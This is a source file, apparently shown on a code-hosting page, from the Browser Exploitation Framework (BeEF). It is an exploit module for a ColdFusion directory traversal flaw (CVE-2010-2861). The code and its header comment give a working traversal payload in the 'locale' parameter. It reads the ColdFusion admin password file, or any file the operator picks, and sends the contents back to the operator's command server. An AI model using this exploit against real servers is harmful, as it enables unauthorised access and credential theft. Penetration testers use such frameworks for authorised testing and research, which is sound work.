Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c0dee2fe548280b47444606ae2d50e0baade4916
beef/modules/exploits/coldfusion_dir_traversal_exploit/command.js
Wade Alcorn fe40038441 Updated copyright year to 2013
2012-12-30 12:47:43 +10:00

38 lines
2.1 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
* Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
* By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
* the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
*
* On a default win installation, the following vector works great:
* http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
* demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
*/
beef.execute(function() {
fileToRetrieve = "<%= @fileToRetrieve %>";
targetOS = "<%= @os_combobox %>";
cf_version = "<%= @cf_version %>";
var uri = null;
if(targetOS == "Windows"){
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
}else{
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
}
beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
if(response.status_code == "success"){
titleStart = response.response_body.indexOf("<title>");
titleEnd = response.response_body.indexOf("</title>");
exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
}
});
});
Reference in New Issue View Git Blame Copy Permalink